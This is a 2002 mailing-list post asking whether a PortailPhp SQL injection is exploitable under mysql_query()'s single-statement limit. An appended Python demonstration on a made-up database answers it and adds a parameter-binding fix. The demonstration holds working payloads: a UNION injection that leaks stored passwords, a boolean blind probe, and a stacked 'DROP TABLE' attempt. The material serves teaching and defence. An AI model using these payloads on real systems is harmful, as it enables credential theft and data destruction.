Subject: BID 6273: PortailPhp SQL Injection Vulnerability.

From: Vinay A. Mahadik (VMahadik@Qualys.com)
Date: 12/27/02

To: vALDEUx@aol.com, vuln-dev@securityfocus.com, vuldb@securityfocus.com


    Hi,

    (Posting on vuln-dev too since this has a generic PHP-MySQL SQL
    Injection Vuln question as well).

    I was working on this vulnerability. I came across the following
    advisory on SecurityFocus-BugTraq:

    http://online.securityfocus.com/archive/1/301572

    I find that PHP's mysql_query() only allows one SQL query per call. This
    makes the above vuln non-exploitable, I think.

    If not, I would like to know how to inject some SQL content between
    LIKE '% and %' (without the quotation marks) and get some meaningful/useful
    response from the server through the mysql_query() query. I have tried
    the usual injections, and only get an error from anything that splits
    the above with semicolons.

    Thanks,
    Vinay.
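The generic question the message raises, whether a one-statement-per-call API rules out injection into a LIKE '%...%' pattern, is worked through below as an added example. It is not code from the original post or from PortailPhp; the table and column names (articles, users) are made up for the example, and Python's sqlite3 stands in for PHP's mysql_query() because cursor.execute() likewise refuses a second, semicolon-separated statement. The point is that stacked queries are only one injection technique: UNION and boolean conditions extend the single statement the application already runs.

```python
import sqlite3


def make_db():
    # Constructed in-memory schema standing in for the application's tables.
    # The names are assumptions for this example, not PortailPhp's real schema.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT);
        INSERT INTO articles VALUES (1, 'PHP portal news');
        INSERT INTO articles VALUES (2, 'MySQL tips');
        CREATE TABLE users (login TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret');
    """)
    return conn


def vulnerable_search(conn, term):
    # The pattern discussed in the thread: user input dropped unescaped
    # between LIKE '% and %'. Like mysql_query(), execute() runs exactly one
    # statement, so an attacker has to stay inside this one SELECT.
    sql = "SELECT id, title FROM articles WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def stacked_injection_fails(conn):
    # A semicolon-separated second statement is rejected by the driver,
    # which matches the error the poster saw with mysql_query().
    try:
        vulnerable_search(conn, "x%'; DROP TABLE users; -- ")
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return True
    return False


def union_injection(conn):
    # Extend the single SELECT instead of adding a second statement: close
    # the LIKE pattern, UNION in rows from another table, and comment out
    # the trailing %'. (In MySQL the comment is "-- " with a space, or "#".)
    payload = "zzz%' UNION SELECT login, password FROM users -- "
    return vulnerable_search(conn, payload)


def boolean_probe(conn, condition):
    # Blind variant for when UNION output is not displayed: AND an arbitrary
    # condition onto the WHERE clause and observe whether any rows come back.
    payload = "%' AND (" + condition + ") -- "
    return len(vulnerable_search(conn, payload)) > 0


def safe_search(conn, term):
    # Fix: bind the whole pattern as a parameter so the input can never leave
    # the string literal. (The PHP mysql_* API of 2002 had no parameter
    # binding; the equivalent there was escaping with mysql_escape_string().)
    sql = "SELECT id, title FROM articles WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("stacked statement rejected:", stacked_injection_fails(db))
    print("UNION leaks:", union_injection(db))
    print("admin exists:", boolean_probe(db, "(SELECT count(*) FROM users WHERE login = 'admin') = 1"))
    print("same payload, bound parameter:", safe_search(db, "zzz%' UNION SELECT login, password FROM users -- "))
```

Both union_injection() and boolean_probe() never send a second statement; they only change what the one SELECT returns, so the single-query restriction of mysql_query() does not by itself make the quoted advisory non-exploitable.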
